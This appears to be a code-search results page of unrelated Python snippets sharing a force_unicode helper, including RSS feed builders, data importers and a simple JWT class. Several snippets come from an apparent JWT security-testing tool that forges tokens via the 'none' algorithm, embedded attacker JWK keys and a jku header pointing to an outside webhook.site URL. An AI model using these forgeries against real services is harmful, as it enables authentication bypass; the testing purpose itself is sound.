Пример #1
0
 def add_item(self, title, link, description, author_email=None,
     author_name=None, author_link=None, pubdate=None, comments=None,
     unique_id=None, enclosure=None, categories=(), item_copyright=None,
     ttl=None, **kwargs):
     """
     Adds an item to the feed. All args are expected to be Python Unicode
     objects except pubdate, which is a datetime.datetime object, and
     enclosure, which is an instance of the Enclosure class.
     """
     to_unicode = lambda s: force_unicode(s, strings_only=True)
     if categories:
         categories = [to_unicode(c) for c in categories]
     if ttl is not None:
         # Force ints to unicode
         ttl = force_unicode(ttl)
     item = {
         'title': to_unicode(title),
         'link': iri_to_uri(link),
         'description': to_unicode(description),
         'author_email': to_unicode(author_email),
         'author_name': to_unicode(author_name),
         'author_link': iri_to_uri(author_link),
         'pubdate': pubdate,
         'comments': to_unicode(comments),
         'unique_id': to_unicode(unique_id),
         'enclosure': enclosure,
         'categories': categories or (),
         'item_copyright': to_unicode(item_copyright),
         'ttl': ttl,
     }
     item.update(kwargs)
     self.items.append(item)
Пример #2
0
    def get(self): # every 1 minute
        feeds = {"nrg": "http://rss.nrg.co.il/newsflash/",
                 "וואלה!": "http://rss.walla.co.il/?w=/1/22/0/@rss",
                 "ynet": "http://www.ynet.co.il/Integration/StoryRss1854.xml",
                 "mako": "http://rcs.mako.co.il/rss/news-israel.xml"}
        
        updates = []

        for name, url in feeds.iteritems():
            for entry in feedparser.parse(url).entries:
                if Update.get_by_key_name(entry.title) is None:
                    entry = Update(key_name=entry.title, 
                           content=utils.force_unicode(entry.title), 
                           date=datetime.datetime.fromtimestamp(time.mktime(entry.date_parsed)),
                           source=utils.force_unicode(name),
                           description=utils.force_unicode(entry.description));
                           
                    entry.put()
                    updates.append(entry)
        
        updates.sort(key=lambda item:item.date, reverse=True)
        
        for client_id in clients:
            try:
                channel.send_message(client_id, utils.updates_to_json(updates))
            except:
                clients.remove(client_id)
Пример #3
0
 def __init__(self, title, link, description, language=None, author_email=None,
         author_name=None, author_link=None, subtitle=None, categories=None,
         feed_url=None, feed_copyright=None, feed_guid=None, ttl=None, **kwargs):
     to_unicode = lambda s: force_unicode(s, strings_only=True)
     if categories:
         categories = [force_unicode(c) for c in categories]
     if ttl is not None:
         # Force ints to unicode
         ttl = force_unicode(ttl)
     self.feed = {
         'title': to_unicode(title),
         'link': iri_to_uri(link),
         'description': to_unicode(description),
         'language': to_unicode(language),
         'author_email': to_unicode(author_email),
         'author_name': to_unicode(author_name),
         'author_link': iri_to_uri(author_link),
         'subtitle': to_unicode(subtitle),
         'categories': categories or (),
         'feed_url': iri_to_uri(feed_url),
         'feed_copyright': to_unicode(feed_copyright),
         'id': feed_guid or link,
         'ttl': ttl,
     }
     self.feed.update(kwargs)
     self.items = []
Пример #4
0
 def test_rsa256_pubkey_to_jwk(self):
     expected_n = b'oGV0P-rgmJd8qEu_0c1YYjNLt8RjBmGcy4X0RXK3lEfHjGWJggkaHFY_zP-m0uWijPl7ASq1gf7cL7w801pLXB_vUqxPyl7rP8ul_4j_ghWjGrl58yNyRBcIVh18HICCqAduvbasehRstSv0JSAP6VArEcpLGOnHI0IILclWjFQf35A4fbsVYbqs2ZUhP7C5Jq36SA5GRqq4QTKuG0YP4t1j9CEEIQUldwHcuoMzBH4GOP0eZd1EkhTw8uQvQeHtao-J0Mfh-ljFC2Rcvoysx6HwGVZIg2DlGiWttYCWzUvc5q2doFIJ640gO9KLFeOC5ebGTwnzJ_Z5jCaim2Eomw'
     expected_e = b'AQAB'
     jwk = rsa_pubkey_to_jwk("./keys/pubkey1.pem", "test_key")
     self.assertEqual(jwk['alg'], "RS256")
     self.assertEqual(jwk['kty'], "RSA")
     self.assertEqual(jwk['kid'], "test_key")
     self.assertEqual(jwk['e'], utils.force_unicode(expected_e))
     self.assertEqual(jwk['n'], utils.force_unicode(expected_n))
Пример #5
0
    def test_attack_pubkey_deception_jwk(self):
        rsa256_token_header = "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9"
        rsa256_token_payload = "eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ"
        rsa256_token_signature = "ZR8EJ-ssd7b3Z9ZrCODkK_tJvOVXNZbcUn_FQAbLlKjPdEkNNCP_i5h84QfRXA8cWu1Z83UOb25Oogw0GIE9k-Q4AJO-BwEC2muHKRdzgHGrO6_2abeFJxAZapSf4ww39UlGzYX22b2kRYECLmsVaa0NV1KyQIf147h460wDGDr1wd2OCvUZXYULA_vzzRo3HHX440XOx_CnBvrR7shqnIjOLycEG61Ganq6oJsujVXHTQUtKdNB1Amu9NEQRRQzYWSTLuUMwV9mJnCuyr9bWp5srd3VPOC1bMXU2UgJiauw8eYu_w2_bbgZOn0jwajiygkfuJXNJGi8k_09sJmJ0w"
        rsa_token_ser = ".".join([
            rsa256_token_header, rsa256_token_payload, rsa256_token_signature
        ])
        rsa_token = TestJWT.deserialize(rsa_token_ser)
        self.assertEqual("RS256", rsa_token.get_algorithm())
        self.assertEqual("JWT", rsa_token.header['typ'])
        self.assertEqual(2, len(rsa_token.header))
        self.assertEqual("1234567890", rsa_token.payload['sub'])
        self.assertEqual("John Doe", rsa_token.payload['name'])
        self.assertEqual(1516239022, rsa_token.payload['iat'])
        self.assertEqual(3, len(rsa_token.payload))
        pk: RSAPrivateKey = load_pem_private_key(
            utils.read_pem_file("./keys/pk1.pem"), None, default_backend())
        pubkey: RSAPublicKey = pk.public_key()
        self.assertTrue(
            rsa_token.verify_signature(
                pubkey, utils.base64url_decode(rsa256_token_signature)))

        rsa_token_jwk = TestJWT.deserialize(rsa_token_ser)
        kid = "my_own_key"
        attack = Attack(rsa_token_ser)
        attack.attack_pubkey_deception_jwk(pk, kid)
        payloads = attack.payloads
        rsa_token_jwk = TestJWT.deserialize(
            payloads['attack_pubkey_deception_jwk'])
        self.assertEqual("RS256", rsa_token_jwk.get_algorithm())
        self.assertEqual("JWT", rsa_token_jwk.header['typ'])
        self.assertEqual("RSA", rsa_token_jwk.header['jwk']['kty'])
        self.assertEqual(kid, rsa_token_jwk.header['jwk']['kid'])
        self.assertEqual("sig", rsa_token_jwk.header['jwk']['use'])
        e = pk.public_key().public_numbers().e
        n = pk.public_key().public_numbers().n
        expected_n = utils.force_unicode(
            utils.base64url_encode(
                n.to_bytes((n.bit_length() + 7) // 8, byteorder='big')))
        expected_e = utils.force_unicode(
            utils.base64url_encode(
                e.to_bytes((e.bit_length() + 7) // 8, byteorder='big')))
        self.assertEqual(expected_n, rsa_token_jwk.header['jwk']['n'])
        self.assertEqual(expected_e, rsa_token_jwk.header['jwk']['e'])
        self.assertEqual(3, len(rsa_token_jwk.header))
        self.assertEqual("1234567890", rsa_token_jwk.payload['sub'])
        self.assertEqual("John Doe", rsa_token_jwk.payload['name'])
        self.assertEqual(1516239022, rsa_token_jwk.payload['iat'])
        self.assertEqual(3, len(rsa_token_jwk.payload))
        rsa_token_jwk_signature = rsa_token_jwk.compute_signature(pk)
        self.assertTrue(
            rsa_token_jwk.verify_signature(
                pubkey, utils.base64url_decode(rsa_token_jwk_signature)))
        expected_signature = "jheDPqm8kxisAUcuDX-gHdTEIQDan_qRphZddj2VkcW-wJbVARly1Wzaw4of96Dl0xJXqJBV_kKG5UmmEiiEjQWUZzY4_XuZmI_STEf7FvVe_OPbN6fmyzGJQZSJVaoXTMYw8_yhQ1fIip6ctGVKrt6752RolratwDsYVZawQ1J9V3WIioPvXjQoyEGbothy7yOxemZXB71SMcQ-mmLKc8v0mirA8kyR8Wg0lw_JkRVRbViItn6SMFg2_Fuf12P1rkxx2qo3BVPzvgz1Nln4U8kFe2HGdtpc2IMTrAvzO0hOhc8cBe2-9HZJAFdGd_6SPhkp1VVlx-qTIL2y0EqH4Q"
        self.assertEqual(expected_signature,
                         utils.force_unicode(rsa_token_jwk_signature))
Пример #6
0
    def test_rs256_signature2(self):
        rsa256_token_header = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImprdSI6Imh0dHBzOi8vd2ViaG9vay5zaXRlLzQ4MjAzNjZlLTRhY2YtNDQ5Mi04YjhiLTJmZDRlMGIyNmJlMiJ9"
        rsa256_token_payload = "eyJ1c2VyIjoiYWRtaW4ifQ"
        rsa256_token_signature = "lJSuLrAA6goQ5f2AXYXV25xZ66yuE_aRQlRpTpirSbVN7SxMOFooPkPIywejg1F5F89vFmibY_ATqu5bvyFjX1dIbb-PPFBSyB3AwgeLGq_UXSyRjf2WEw-UWYxq00l6b3f8qOI2nuS8Ea3iy5xfGqc6geUXXtJZN02o-QWoZ0qZ6vECrL3__dwbFQDLdgIw_TPYzrVjjLk69islxE8Vv9G5ZOAtwFZrzcZuTQTMTRJrpMNstuX4gYeJOu7VUWzKoQjT4D_PUX4mB_Sn80JyVMHPjcse_ZtHSkWgse86Gx0-Tmv7B7tqTXNtNfugctrkUxwZM2b0k4XYErnycXK-Bg"
        rsa_token_ser = ".".join([
            rsa256_token_header, rsa256_token_payload, rsa256_token_signature
        ])
        rsa_token = TestJWT.TestJWT.deserialize(rsa_token_ser)

        self.assertEqual("RS256", rsa_token.header['alg'])
        self.assertEqual("JWT", rsa_token.header['typ'])
        self.assertEqual(
            "https://webhook.site/4820366e-4acf-4492-8b8b-2fd4e0b26be2",
            rsa_token.header['jku'])
        self.assertEqual("admin", rsa_token.payload['user'])

        pk = load_pem_private_key(utils.read_pem_file("./keys/pk1.pem"), None,
                                  default_backend())
        pubkey = load_pem_public_key(utils.read_pem_file("./keys/pubkey1.pem"),
                                     default_backend())
        signature = rsa_token.compute_signature(pk)
        self.assertEqual(rsa256_token_signature,
                         utils.force_unicode(signature))
        self.assertTrue(
            rsa_token.verify_signature(pubkey,
                                       utils.base64url_decode(signature)))
        self.assertTrue(
            rsa_token.verify_signature(
                pubkey, utils.base64url_decode(rsa256_token_signature)))
Пример #7
0
def importSentences(data):
    counter = 0
    for sent in data:
        for iso, langstring in sent.items():
            Sentence(value=utils.force_unicode(langstring),
                     group=str(counter),
                     locale=iso).save()
        counter += 1
Пример #8
0
 def attack_payload(self, payload_file: str):
     lines = read_file(payload_file, join_lines=False)
     header, payload, signature = TestJWT.split_jwt(self.ser_jwt)
     header = json.loads(utils.base64url_decode(header))
     inj_headers = [inject_in_json(header, line) for line in lines]
     for index, inj_header in zip(range(1, 1 + len(inj_headers)),
                                  inj_headers):
         self.payloads["attack_payload_{}".format(index)] = ".".join(
             [utils.force_unicode(inj_header), payload, signature])
Пример #9
0
 def test(self, testfile):
     self.session = TestFile.q.session
     try:
         results = remote.analyze2(testfile.name)
         for test_name, (passing, failing) in results.items():
             test, _ = Test.get_or_create(name=force_unicode(test_name),
                                          testfile=testfile)
             testfile.tests.append(test)
             for assertion in itertools.chain(passing, failing):
                 a, _ = Assertion.get_or_create(
                     text=force_unicode(assertion),
                     test=test)
                 result = Result(assertion=a, fail=assertion in failing,
                                 revision_id=self.rev)
                 self.session.add_all((a, result))
     except remote.BrokenTest:
         self.session.add(BrokenTest(revision_id=self.rev,
                                     testfile=testfile))
Пример #10
0
    def attack_none(self, jwt: TestJWT = None):
        """
        Modifies algorithm from jwt and replaces it with none, None and NONE
        :param jwt: (optional) jwt to use
        :return: map with the different payloads, the key is the name of the modification,
        the JWT payload is the value
        """
        if jwt is None:
            jwt = self.init_token()

        jwt.set_algorithm('none')
        self.payloads['attack_alg_none'] = utils.force_unicode(
            jwt.build_token())
        jwt.set_algorithm('None')
        self.payloads['attack_alg_None'] = utils.force_unicode(
            jwt.build_token())
        jwt.set_algorithm('NONE')
        self.payloads['attack_alg_NONE'] = utils.force_unicode(
            jwt.build_token())
Пример #11
0
 def process_queue(self):
     self.session = TestFile.q.session
     while not self.queue.empty():
         filename = force_unicode(self.queue.get())
         testfile, _ = TestFile.get_or_create(name=filename)
         log.debug('%s: Testing %s...' % (self.getName(), testfile.name))
         self.test(testfile)
         self.session.add(testfile)
         with CommitLock:
             self.session.commit()
         log.debug('%s: Finished %s' % (self.getName(), testfile.name))
Пример #12
0
 def attack_pubkey_deception_jwk(self,
                                 pk: RSAPrivateKey,
                                 kid: str,
                                 jwt: TestJWT = None):
     if jwt is None:
         jwt = self.init_token()
     pubkey: RSAPublicKey = pk.public_key()
     jwk = utils.rsa_pubkey_to_jwk(pem_file=None, key_id=kid, pubkey=pubkey)
     jwt.header['jwk'] = jwk
     jwt.header['jwk']['use'] = "sig"
     del (jwt.header['jwk']['alg'])
     self.payloads['attack_pubkey_deception_jwk'] = utils.force_unicode(
         jwt.build_token(pk))
Пример #13
0
def add_revision(commit):
    """Add a Revision for the given git hash."""
    revdata = vcs.info(commit)

    if Revision.q.filter_by(git_id=revdata['git_id']).count() != 0:
        return

    for key in 'message', 'author':
        revdata[key] = force_unicode(revdata[key])

    revision = Revision(**revdata)

    session = Revision.q.session
    session.add(revision)
    with CommitLock:
        session.commit()

    return revision
Пример #14
0
    def deserialize(ser_token: str):
        """
        Builds a TestJWT from a serialized JWT representation
        :param ser_token: serialized token
        :return: TestJWT instance
        """
        tok1, tok2, sig = TestJWT.split_jwt(ser_token)
        head = utils.base64url_decode(tok1)
        payload = utils.base64url_decode(tok2)
        jwt = TestJWT()
        jwt.original_jwt = ser_token

        # noinspection PyBroadException
        try:
            jwt.header = json.loads(head)
            jwt_payload = json.loads(payload)
            jwt.set_payload(jwt_payload)
        except:
            jwt.set_payload(utils.force_unicode(payload))
        return jwt
Пример #15
0
    def generate_payload(self, msg, exp=int(time.time()) + 300):
        '''
			desc: 生成payload
			input: 
				msg type: json
				{
				'nickname' : u'王强',
				'gender' 1
				}
			return:
				payload type:string base64 
		'''

        msg = force_unicode(msg)
        self.payload = json.loads(msg)
        self.payload['exp'] = exp  # 预留5分钟登录有效期
        # 序列化
        payload_json = json.dumps(self.payload, separators=(',', ':'))
        self.payload = base64urlencode(payload_json)
        return self.payload
Пример #16
0
    def attack_pubkey_deception_jku(self,
                                    pk: RSAPrivateKey,
                                    jku_url,
                                    jwt: TestJWT = None,
                                    kid=None):
        if jwt is None:
            jwt = self.init_token()
        print("jwt {}".format(jwt))
        jwt.header['jku'] = jku_url
        if kid is not None:
            jwt.header['kid'] = kid
        self.payloads['attack_pubkey_deception_jku'] = utils.force_unicode(
            jwt.build_token(pk))

        pubkey: RSAPublicKey = pk.public_key()
        jwks = {}
        jwks['keys'] = [
            utils.rsa_pubkey_to_jwk(pem_file=None, key_id=kid, pubkey=pubkey)
        ]
        self.payloads['attack_pubkey_deception_jku_jwks'] = json.dumps(
            jwks, separators=(",", ":"))
Пример #17
0
    def verify_token(self, token):
        '''
			desc: 验证token是否有效
			input: token
						{ 
						type: str
						}
			return :
					success:
						Boolean: True
					error:
						1.token : timeout 过期失效 
						2.token : losed 已丢失失效包括已篡改
						3.token : error format 格式错误失效
		'''
        print "token", token, len(token.split('.'))
        if len(token.split('.')) == 3:
            hea, pal, sig = token.split('.')
            msg = force_unicode(hea + '.' + pal)
            not_falsified = hmac.verify(msg, self.secret, sig)
            print "not_falsified", not_falsified
            return not_falsified
Пример #18
0
					error:
						1.token : timeout 过期失效 
						2.token : losed 已丢失失效包括已篡改
						3.token : error format 格式错误失效
		'''
        print "token", token, len(token.split('.'))
        if len(token.split('.')) == 3:
            hea, pal, sig = token.split('.')
            msg = force_unicode(hea + '.' + pal)
            not_falsified = hmac.verify(msg, self.secret, sig)
            print "not_falsified", not_falsified
            return not_falsified
        # else: todo
        # 	raise 3.token : error format 格式错误失效


if __name__ == '__main__':
    wd = wdJwt()
    print 'header: ', wd.generate_header()
    payload_str = force_unicode(json.dumps({'nickname': u'王强', 'gender': 1}))

    # payload_str = json.dumps({
    # 			'nickname' : 'wangqiang',
    # 			'gender': 1
    # 			})
    print 'payload: ', wd.generate_payload(payload_str)
    print 'signature: ', wd.generate_signature()
    first_token = wd.generate_token()
    print 'token: ', first_token
    print 'token code: ', chardet.detect(first_token)
    print 'verify token', wd.verify_token(first_token)
Пример #19
0
	def __str__(self):
		if hasattr(self, '__unicode__'):
			return force_unicode(self).encode('utf-8')
		return '{} object'.format(self.__class__.__name__)
Пример #20
0
def importSentences(data):
    counter = 0
    for sent in data:
        for iso, langstring in sent.items():
            Sentence(value = utils.force_unicode(langstring),group = str(counter),locale = iso).save()
        counter += 1
Пример #21
0
 def __unicode__(self):
     return force_unicode(self.word)
Пример #22
0
 def __unicode__(self):
     return force_unicode(self.word)